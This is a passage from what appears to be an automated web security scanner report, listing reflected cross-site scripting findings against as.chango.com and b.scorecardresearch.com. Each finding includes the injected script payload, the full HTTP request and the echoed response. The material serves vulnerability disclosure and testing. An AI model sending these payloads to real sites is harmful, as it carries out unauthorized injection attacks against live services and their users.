1720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c98b84"><script>alert(1)</script>1a58b06938f&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0
...[SNIP]...

3.44. http://as.chango.com/links/adunit/1.31784959608e+12 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 630a0"><script>alert(1)</script>8680e005f04 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442630a0"><script>alert(1)</script>8680e005f04 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "dbc757c09f1aecb558295edd424abd9166e1619e"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:25 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:25 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
e&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442630a0"><script>alert(1)</script>8680e005f04&cu=&dsi=None&clickURL=">
...[SNIP]...

3.45. http://as.chango.com/links/adunit/1.31784959608e+12 [st parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf75"><script>alert(1)</script>82dd5aa6d77 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broadecf75"><script>alert(1)</script>82dd5aa6d77&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "aebc4132b113c4b83f70defa48889b5467cd0eab"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadecf75%22%3E%3Cscript%3Ealert%281%29%3C/script%3E82dd5aa6d77; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broadecf75"><script>alert(1)</script>82dd5aa6d77&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&click
...[SNIP]...

3.46. http://as.chango.com/links/adunit/1.31784959608e+12 [stid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a6c"><script>alert(1)</script>c83276f8e05 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com12a6c"><script>alert(1)</script>c83276f8e05&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5776f794450378623c9d462e194737a4808e726e"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:24 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com12a6c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ec83276f8e05%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.9;sz=728x90;ord=1317850524373;click1=http://as.chango.com/links/click1317850524.38?acid=10699&adid=13711&agid=11720&stid=wattpad.com12a6c"><script>alert(1)</script>c83276f8e05&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=sa
...[SNIP]...

3.47. http://as.chango.com/links/adunit/1.31784959608e+12 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4658b"><script>alert(1)</script>8afd7eebac2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon4658b"><script>alert(1)</script>8afd7eebac2&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dc6713bfb129ef207ed7f611acacc3c1fba28b9"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:24 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ANGO/B5866234.9;sz=728x90;ord=1317850524803;click1=http://as.chango.com/links/click1317850524.81?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon4658b"><script>alert(1)</script>8afd7eebac2&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&k
...[SNIP]...

3.48. http://as.chango.com/links/adunit/1.31784959608e+12 [wh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f78f2"><script>alert(1)</script>a9e45e493c5 was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728f78f2"><script>alert(1)</script>a9e45e493c5&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 464
Server: Chango RTB Server
ETag: "b6b02b2ea821ec77770fcdfb020024fce5ed3dd7"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:25 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:25 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 728f78f2"><script>alert(1)</script>a9e45e493c5px; height: 90px; margin: 0; padding: 0;">
...[SNIP]...

3.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 57262<script>alert(1)</script>69a836d822e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=857262<script>alert(1)</script>69a836d822e&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:26 GMT
Date: Wed, 05 Oct 2011 20:41:26 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"857262<script>alert(1)</script>69a836d822e", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 2eb65<script>alert(1)</script>e135a45addd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=2eb65<script>alert(1)</script>e135a45addd&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:38 GMT
Date: Wed, 05 Oct 2011 20:41:38 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"2eb65<script>alert(1)</script>e135a45addd", c15:"", c16:"", r:""});



3.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9fa76<script>alert(1)</script>d9b292fdfe2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15=9fa76<script>alert(1)</script>d9b292fdfe2 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:40 GMT
Date: Wed, 05 Oct 2011 20:41:40 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
SCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"9fa76<script>alert(1)</script>d9b292fdfe2", c16:"", r:""});



3.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8f927<script>alert(1)</script>18743ec238e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=30056938f927<script>alert(1)</script>18743ec238e&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:29 GMT
Date: Wed, 05 Oct 2011 20:41:29 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"30056938f927<script>alert(1)</script>18743ec238e", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b3bf<script>alert(1)</script>03c12efd9cd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=15b3bf<script>alert(1)</script>03c12efd9cd&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:31 GMT
Date: Wed, 05 Oct 2011 20:41:31 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"15b3bf<script>alert(1)</script>03c12efd9cd", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 6f66a<script>alert(1)</script>43bf8311a42 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com6f66a<script>alert(1)</script>43bf8311a42&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
